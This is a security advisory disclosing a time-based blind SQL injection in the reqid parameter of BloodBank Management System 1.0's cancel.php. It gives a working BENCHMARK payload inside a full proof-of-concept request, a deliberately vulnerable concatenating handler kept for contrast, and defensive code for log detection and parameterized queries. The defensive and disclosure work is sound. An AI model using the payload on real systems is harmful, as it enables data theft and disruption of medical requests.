
@higordiego
Created October 25, 2024 19:51

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection (Time-Based Blind)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • /file/cancel.php?reqid=2

Vulnerability Description:

A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0, specifically in the cancel request functionality. The flaw arises because the reqid parameter of /file/cancel.php is placed into the SQL query without proper validation or sanitization, allowing a malicious user to inject SQL into the statement that handles cancellation requests.

The vulnerability allows for a time-based blind SQL injection attack. The attacker injects SQL that makes the database perform a time-consuming operation, such as the MySQL BENCHMARK function, so that the response is delayed. If the injected SQL is executed, the response arrives after a measurable delay, confirming that the injection worked even though no query result is shown in the page. This technique can lead to:

  • Exfiltration of sensitive data over time.
  • Denial of Service (DoS) by slowing down the system.
  • Tampering with blood request statuses, including unauthorized cancellations.

Proof of Concept (PoC):

Below is an example of a GET request demonstrating the time-based blind SQL injection vulnerability:

GET /file/cancel.php?reqid=2'%20AND%202655%3dBENCHMARK(5000000%2cMD5(0x74466957))--%20pFWQ HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A-.%20Our%20team%20will%20contact%20you%20soon.
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

Explanation:

In this PoC, the injected BENCHMARK call forces the database to compute 5,000,000 MD5 hashes, so the response is delayed whenever the altered SQL query executes successfully. The delayed response confirms that the injected SQL reached the backend and was executed, which is sufficient to establish the vulnerability.
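The same delay that confirms the injection for an attacker is what makes this request class visible to a defender. The following is an added example, not code from the gist or from the BloodBank Management System: it scans constructed web-server access-log lines (combined log format with an assumed trailing request-duration field in seconds), decodes the reqid parameter sent to /file/cancel.php, and flags requests whose reqid is not a plain integer, contains a SQL timing function, or took unusually long to answer. The log lines, IP addresses, timestamps and the 2-second threshold are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined format plus an assumed
# trailing request-duration field in seconds). Hosts and times are invented;
# the second line carries the URL-encoded payload shown in the PoC above.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Oct/2024:19:50:58 +0000] "GET /file/cancel.php?reqid=2 HTTP/1.1" 302 0 0.014
10.0.0.5 - - [25/Oct/2024:19:51:02 +0000] "GET /file/cancel.php?reqid=2'%20AND%202655%3dBENCHMARK(5000000%2cMD5(0x74466957))--%20pFWQ HTTP/1.1" 200 0 4.873
10.0.0.9 - - [25/Oct/2024:19:51:10 +0000] "GET /sentrequest.php?msg=ok HTTP/1.1" 200 1532 0.021
10.0.0.7 - - [25/Oct/2024:19:51:15 +0000] "GET /file/cancel.php?reqid=7 HTTP/1.1" 302 0 3.950
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<secs>\d+(?:\.\d+)?)$'
)
# MySQL timing primitives commonly seen in time-based blind injection.
TIME_FUNC_RE = re.compile(r"\b(BENCHMARK|SLEEP)\s*\(", re.IGNORECASE)
# A legitimate reqid is a plain integer; anything else is suspicious.
REQID_RE = re.compile(r"^[0-9]{1,10}$")
SLOW_SECONDS = 2.0          # assumed threshold; tune to the app's baseline
CANCEL_PATH = "/file/cancel.php"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["secs"] = float(rec["secs"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes the values, so the raw payload becomes readable.
    rec["params"] = dict(parse_qsl(parts.query, keep_blank_values=True))
    return rec


def inspect(rec):
    """Return the list of reasons a cancel.php request looks like time-based SQLi."""
    reasons = []
    if rec["path"] != CANCEL_PATH:
        return reasons
    reqid = rec["params"].get("reqid", "")
    if not REQID_RE.fullmatch(reqid):
        reasons.append("reqid is not a plain integer")
    if TIME_FUNC_RE.search(reqid):
        reasons.append("SQL timing function in reqid")
    if rec["secs"] >= SLOW_SECONDS:
        # A slow response on its own is a weak signal; it corroborates the others.
        reasons.append(f"slow response ({rec['secs']:.3f}s)")
    return reasons


def scan(log_text):
    """Scan log text and return (client_ip, decoded_reqid, reasons) for each hit."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = inspect(rec)
        if reasons:
            findings.append((rec["ip"], rec["params"].get("reqid", ""), reasons))
    return findings


if __name__ == "__main__":
    for ip, reqid, reasons in scan(SAMPLE_LOG):
        print(f"{ip}  reqid={reqid!r}")
        for r in reasons:
            print(f"    - {r}")
```

The request on line four is flagged only for its duration; on a real system that single signal should be correlated with the other two before anyone acts on it, but combined with a malformed reqid it is a strong indicator that the PoC above, or a variant of it, is being run against the endpoint.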

Screenshots: Image One, Image Two

Impact:

  • Data Breach: Attackers could extract data from the database over time.
  • Denial of Service (DoS): Multiple malicious requests could overload the server, reducing system availability.
  • Unauthorized Cancellations: Attackers could cancel blood requests without proper authorization, disrupting critical processes.
  • System Integrity Issues: Alterations in request records could cause confusion or operational failures in blood request management.

Mitigation Recommendations:

  1. Use Parameterized Queries: Replace dynamic queries with prepared statements to prevent SQL injection.
  2. Input Validation: Ensure that all input parameters, including reqid, are properly validated and sanitized.
  3. Database Privileges: Limit the database user's permissions to minimize potential damage from an exploit.
  4. Error Handling: Avoid exposing detailed error messages that might aid attackers in crafting injections.
  5. Rate Limiting and Monitoring: Monitor requests and apply rate limits to prevent denial-of-service attacks.
  6. Security Testing: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities early.
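Recommendations 1 and 2 together close the hole described above. The following is an added example, not code from the gist or from the BloodBank Management System, that rebuilds the cancel handler two ways against an in-memory SQLite table: one that concatenates reqid into the SQL text (the pattern the description attributes to cancel.php, assuming the value is wrapped in single quotes, which is consistent with the leading `'` in the PoC payload), and one that validates reqid as a positive integer and binds it as a parameter. The table name, column names and seed rows are assumptions made for the example. SQLite has no BENCHMARK or MD5 function, so the injected payload surfaces as a "no such function" error in the vulnerable path, which is enough to prove the injected text reached the SQL parser; the hardened path rejects the same input before any SQL runs.

```python
import re
import sqlite3

# Constructed payload: the URL-decoded reqid value from the PoC request above.
POC_PAYLOAD = "2' AND 2655=BENCHMARK(5000000,MD5(0x74466957))-- pFWQ"

# A request id is a positive integer; anything else is rejected up front.
REQID_RE = re.compile(r"^[1-9][0-9]{0,9}$")


def setup_db():
    """Create an in-memory table standing in for the app's request table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE blood_requests (id INTEGER PRIMARY KEY, status TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO blood_requests (id, status) VALUES (?, ?)",
        [(1, "pending"), (2, "pending"), (3, "pending")],
    )
    conn.commit()
    return conn


def cancel_vulnerable(conn, reqid):
    """Mirrors the flaw: reqid is spliced into the SQL text.

    Returns {"rows": n} on success or {"error": message} if the database
    rejects the statement. Any error text naming the injected function
    shows that attacker-controlled text was parsed as SQL.
    """
    sql = f"UPDATE blood_requests SET status='cancelled' WHERE id='{reqid}'"
    try:
        cur = conn.execute(sql)
        conn.commit()
        return {"rows": cur.rowcount}
    except sqlite3.Error as exc:
        return {"error": str(exc)}


def validate_reqid(raw):
    """Recommendation 2: accept only a plain positive integer, else raise ValueError."""
    if not REQID_RE.fullmatch(raw):
        raise ValueError("reqid must be a positive integer")
    return int(raw)


def cancel_hardened(conn, raw_reqid):
    """Recommendation 1: the value is bound as a parameter, never as SQL text."""
    reqid = validate_reqid(raw_reqid)
    cur = conn.execute(
        "UPDATE blood_requests SET status='cancelled' WHERE id=?", (reqid,)
    )
    conn.commit()
    return cur.rowcount


def statuses(conn):
    """Snapshot of the table as {id: status} for inspection."""
    return dict(conn.execute("SELECT id, status FROM blood_requests ORDER BY id"))


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, benign id:", cancel_vulnerable(db, "2"))
    print("vulnerable, PoC payload:", cancel_vulnerable(db, POC_PAYLOAD))
    print("hardened, benign id:", cancel_hardened(db, "3"))
    try:
        cancel_hardened(db, POC_PAYLOAD)
    except ValueError as exc:
        print("hardened, PoC payload rejected:", exc)
    print(statuses(db))
```

Even with the parameter bound, the hardened handler still needs the authorization check recommendation 3 alludes to (the caller must own the request being cancelled); parameterization stops the query from being rewritten, it does not decide who may run it.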